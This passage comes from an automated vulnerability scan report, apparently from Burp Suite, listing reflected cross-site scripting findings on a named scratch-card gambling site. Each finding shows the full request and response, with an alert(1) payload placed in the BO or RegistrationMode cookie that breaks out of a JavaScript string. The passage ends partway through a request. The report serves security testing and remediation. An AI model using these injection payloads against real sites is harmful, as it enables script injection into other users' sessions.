<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa1333"-alert(1)-"964b23fefd3";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.215. http://www.bigmoneyscratch.com/Home.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70d67"-alert(1)-"00fd2eea37f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM70d67"-alert(1)-"00fd2eea37f; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: BO=FM70d67"-alert(1)-"00fd2eea37f; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47481


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM70d67"-alert(1)-"00fd2eea37f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.216. http://www.bigmoneyscratch.com/Home.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 380a7"-alert(1)-"bce14838cf was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM380a7"-alert(1)-"bce14838cf; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM380a7"-alert(1)-"bce14838cf; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM380a7"-alert(1)-"bce14838cf";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.217. http://www.bigmoneyscratch.com/InviteFriend.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a03"-alert(1)-"29adba2d383 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM13a03"-alert(1)-"29adba2d383; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: BO=FM13a03"-alert(1)-"29adba2d383; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM13a03"-alert(1)-"29adba2d383";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.218. http://www.bigmoneyscratch.com/InviteFriend.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8644e"-alert(1)-"45cb3bc9a5e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM8644e"-alert(1)-"45cb3bc9a5e; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8644e"-alert(1)-"45cb3bc9a5e; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8644e"-alert(1)-"45cb3bc9a5e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.219. http://www.bigmoneyscratch.com/Mobile.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Mobile.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df086"-alert(1)-"84606e014ba was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMdf086"-alert(1)-"84606e014ba; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: BO=FMdf086"-alert(1)-"84606e014ba; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdf086"-alert(1)-"84606e014ba";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.220. http://www.bigmoneyscratch.com/Mobile.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Mobile.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b14d3"-alert(1)-"ef1c5dc00c was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMb14d3"-alert(1)-"ef1c5dc00c; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb14d3"-alert(1)-"ef1c5dc00c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb14d3"-alert(1)-"ef1c5dc00c";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.221. http://www.bigmoneyscratch.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53d2"-alert(1)-"a15a5a51b9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMd53d2"-alert(1)-"a15a5a51b9; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: BO=FMd53d2"-alert(1)-"a15a5a51b9; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd53d2"-alert(1)-"a15a5a51b9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.222. http://www.bigmoneyscratch.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bab6"-alert(1)-"9b62db20f9e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM6bab6"-alert(1)-"9b62db20f9e; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM6bab6"-alert(1)-"9b62db20f9e; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55180


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM6bab6"-alert(1)-"9b62db20f9e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.223. http://www.bigmoneyscratch.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ad17"-alert(1)-"7e10f8c55e5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM3ad17"-alert(1)-"7e10f8c55e5; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: BO=FM3ad17"-alert(1)-"7e10f8c55e5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3ad17"-alert(1)-"7e10f8c55e5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.224. http://www.bigmoneyscratch.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda30"-alert(1)-"17b8fe426b3 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
